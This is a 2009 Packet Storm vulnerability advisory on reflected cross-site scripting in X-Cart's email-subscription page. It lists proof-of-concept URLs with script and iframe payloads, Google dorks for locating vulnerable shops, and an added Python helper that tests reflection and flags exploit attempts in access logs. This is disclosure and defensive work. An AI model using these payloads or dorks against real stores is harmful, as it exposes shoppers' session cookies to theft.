X-Cart Email Subscription Cross Site Scripting

2009-10-05T00:00:00
ID PACKETSTORM:81810
Type packetstorm
Reporter Paulo Santos
Modified 2009-10-05T00:00:00

Description

                                        
                                            `## X-Cart XSS in email subscription ##  
  
## Download: http://www.x-cart.com/ ##  
  
## Discovered by: Paulo Santos ##  
  
## Contact: paulo@infocampoap.com.br ##  
  
## Blog: http://infocampo.wordpress.com ##  
  
http://target/[path]/customer/home.php?mode=subscribed&email=<plaintext/>  
http://target/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>  
http://target/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800>  
  
Path is usually /xcart/  
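The helper below is an added example for readers of this advisory; it is not part of Paulo Santos' original post nor X-Cart's own code. It builds the three PoC URLs above from their payloads, checks whether a response echoes the `email` value back into the page unencoded (the condition that makes this a reflected XSS) as opposed to HTML-encoded (the fix), and flags access-log requests that carry markup in that parameter. The `http://target` host, the `/xcart/` path (taken from "Path is usually /xcart/"), the simulated confirmation page in `render_subscribed_page` and the sample log lines are all constructed assumptions; to run it against a real install you are authorized to test, pass a real `fetch` callable to `check_reflection`.

```python
import html
import re
from urllib.parse import parse_qs, quote, urlsplit

# The three payloads from the advisory's PoC URLs.
ADVISORY_PAYLOADS = [
    "<plaintext/>",
    "<script>alert(document.cookie);//<</script>",
    "<iframe src=http://www.google.com.br width=800>",
]


def build_poc_url(base, payload, path="/xcart/"):
    """Build the subscription-confirmation URL with an attacker-chosen email value.

    base is scheme+host (e.g. "http://target", an assumed placeholder); path
    defaults to the advisory's "usually /xcart/". The payload is percent-encoded
    so the URL survives shells, proxies and log parsers intact.
    """
    return (f"{base.rstrip('/')}{path}customer/home.php"
            f"?mode=subscribed&email={quote(payload, safe='')}")


def render_subscribed_page(email, escape_output):
    """Simulated confirmation page (constructed stand-in, not X-Cart's template).

    escape_output=False mimics the behaviour the advisory reports: the email
    value is echoed into the HTML verbatim. escape_output=True is the fix:
    HTML-encode untrusted data before it lands in an HTML context.
    """
    shown = html.escape(email, quote=True) if escape_output else email
    return f"<html><body><p>Your e-mail address {shown} has been subscribed.</p></body></html>"


def fake_server(url, escape_output):
    """Offline stand-in for an X-Cart install: reads ?email= and renders the page."""
    email = parse_qs(urlsplit(url).query).get("email", [""])[0]
    return render_subscribed_page(email, escape_output)


def is_reflected_unencoded(body, payload):
    """True if the payload appears in the response byte-for-byte, i.e. as live markup.

    An encoded reflection (&lt;script&gt;...) is inert and returns False.
    """
    return payload in body


def check_reflection(fetch, base, payloads=ADVISORY_PAYLOADS, path="/xcart/"):
    """Map each payload to whether fetch(url) -> body reflects it unencoded.

    fetch may be a real client such as
        lambda u: urllib.request.urlopen(u).read().decode("utf-8", "replace")
    against a host you are authorized to test, or the fake_server stub.
    """
    return {p: is_reflected_unencoded(fetch(build_poc_url(base, p, path)), p)
            for p in payloads}


# --- Detection side: spot exploitation attempts in web-server access logs ---

# Request line of an Apache/nginx combined-format entry.
CLF_REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_email_in_request(request_target):
    """True for home.php?mode=subscribed requests whose email param carries markup.

    Only < and > are used as indicators: apostrophes are legal in e-mail local
    parts (o'brien@example.com), so matching on quotes would false-positive.
    """
    parts = urlsplit(request_target)
    if not parts.path.endswith("/customer/home.php"):
        return False
    qs = parse_qs(parts.query)  # percent-decodes the values
    if qs.get("mode") != ["subscribed"]:
        return False
    return any("<" in v or ">" in v for v in qs.get("email", []))


def flag_log_lines(lines):
    """Return the access-log lines that look like attempts against this XSS."""
    hits = []
    for line in lines:
        m = CLF_REQUEST.search(line)
        if m and suspicious_email_in_request(m.group(1)):
            hits.append(line)
    return hits


# Constructed sample log: one legitimate subscription, two PoC-style requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Oct/2009:10:00:00 +0000] "GET /xcart/customer/home.php'
    '?mode=subscribed&email=bob%40example.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Oct/2009:10:00:01 +0000] "GET /xcart/customer/home.php'
    '?mode=subscribed&email=%3Cscript%3Ealert(document.cookie)%3B//%3C%3C/script%3E HTTP/1.1" 200 600',
    '10.0.0.9 - - [05/Oct/2009:10:00:02 +0000] "GET /xcart/customer/home.php'
    '?mode=subscribed&email=%3Ciframe%20src%3Dhttp://www.google.com.br%20width%3D800%3E HTTP/1.1" 200 610',
]


if __name__ == "__main__":
    for label, esc in (("vulnerable", False), ("patched", True)):
        print(label, check_reflection(lambda u: fake_server(u, esc), "http://target"))
    for line in flag_log_lines(SAMPLE_LOG):
        print("ALERT:", line)
```

The reflection check deliberately tests for the raw payload rather than for a 200 status or for the string `alert`: a site that HTML-encodes the value still echoes the text, so only a byte-for-byte match tells you the markup is live. On the detection side the rule is scoped to `mode=subscribed` on `customer/home.php` so that legitimate angle brackets elsewhere on the site do not trip it.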
  
Google dork:  
inurl:xcart/customer/  
inurl:xcart/customer/home.php  
"X-CART. Powerful PHP shopping cart software"  